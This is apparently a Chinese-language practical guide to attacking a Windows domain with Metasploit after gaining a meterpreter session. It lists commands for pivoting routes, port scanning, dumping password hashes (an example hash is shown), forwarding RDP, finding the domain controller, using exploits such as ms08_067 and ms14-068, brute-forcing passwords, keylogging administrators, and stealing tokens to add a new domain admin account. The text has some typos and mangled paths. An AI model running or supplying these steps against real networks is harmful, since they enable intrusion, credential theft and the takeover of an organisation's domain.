MSF 下域内渗透实战
先获取域内机器session
run get_local_subnets //获取本地网络子网掩码
route add 192.168.233.0 255.255.255.0 1 //添加路由表
run autoroute -s 192.168.2.0 -n 255.255.255.0 //也可以添加一条静态路由
run autoroute -s 192.168.2.0/24 //添加动态路由
route print //打印路由表
use auxliary/scanner/portscan/tcp //使用扫描模块对整个 C 段跨网段扫描
use priv //运行注入
run post/windows/gather/hashdump //获取用户名 hash 值
Administrator:500:aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4
只要是管理员在线或者没有注销。我们可以抓取明文的
kerberos //管理员在线或者没有注销下获取明文
3.收集域环境信息+找到域控
利用msf 的端口转发功能来转发一下,然后登入对方的远程桌面看看。
meterpreter > portfwd add -l 2222 -r 127.0.0.1 -p 3389 //反弹 127.0.0.1 端口 3389 到本地 2222 并监听
meterpreter > portfwd
root@kali:~# netstat -an | grep “2222”
root@kali:~# rdesktop 127.0.0.1:2222
成功登录目标远程桌面。
收集域的信息:
3.1.ipconfig /all
找到域控地址192.168.88.130
3. 2.net view
net view /domain //查看自己的有几个域
注:一般 net view 服务器有简单的备注信息如下:
\dns dnsserver
\sqldata sqlserver
\mail exchage
\oa oa server
比如 dns(一般为 DC 域控)
还有要是备注为 servidor master ad
3.3.ip 分析网络结构
接下来一个一个 ping,或者直接写脚本
3.4.用户和组信息
net user
net user /domain – – 可以看到域的所有成员
net group “domain admins” /domain —— 查询域管理员用户组
我们可以在 net view 的解释可以发现 要是备注为 servidor master ad 那它是域控可能性是很大的
由于 dns 一般就是域控。我们可以通过这个来找域控
还可以 nslookup 来找等等
3.5.搞定域控
1.溢出
ms08_067
要是局域网里面有 xp/2k 的那这个成功率比较高
但是我的域控是 2008
这里也可以用 ms14-068 进行普通域用户提权为域管理员权限
2.DNS 溢出
DNS 服务器可能就是域控 so…
3.弱口令爆破
弱口令+已经控制的服务器口令+
将抓下的明文+一些常用弱口令。组合成字典去。
爆破局域网中存在数据库服务器的主机
由于 2008 默认安全口令策略, 口令强度比较强 ,这个扫描就算吧
4.键盘记录+3389 登入记录
这个记录了 在线管理员的 键盘记录~
可以用 msf 的试试
最后将 msf 的进程转移到 explorer.exe .这样可以正常键盘记录了
不转移可能有一些莫名情况
ps //查看到 exploer.exe 进程为 3804
migrate 3804 //注入进程
keyscan_dump //进行键盘监控
5.假冒令牌
在假冒攻击中 我们将盗取目标系统的一个 Kerberos 令牌,将其用在身份认证中。来假冒当初建立这个令牌的用户。为了能够获取到域管理员的凭证我们需要用域管理员登录一下远程桌面。
meterpreter > use incognito //加载会话令牌模块
meterpreter > list_tokens -u //列出会话令牌,需要管理员权限,如果是普通权限需要提权
看到 PAYLOADadministrator 这个域管理员账号,尝试去盗取一下
meterpreter > impersonate_token PAYLOAD\Administrator \盗取 administrator 令牌
注意:PAYLOADAdministrator中间需要多加一条右划线 \
2.add_user admin Qwer1234!@#$ -h 192.168.88.130 有口令安全安全机制 口令复杂些就可以了
3.add_group_user “Domain Admins” admin -h 192.168.88.130 \ 是将其加到域管理员中
注意:这里也可以用 mimikatz 直接获取明文,只要域管理员远程桌面登录。
6.嗅探
用 cain.exe 吧 这个嗅探神器 = =,或者msf下的嗅探也可以
7. ipc$
net use \192.168.88.130c$ admin@123 /user:payloadadministrator
net time \192.168.88.130
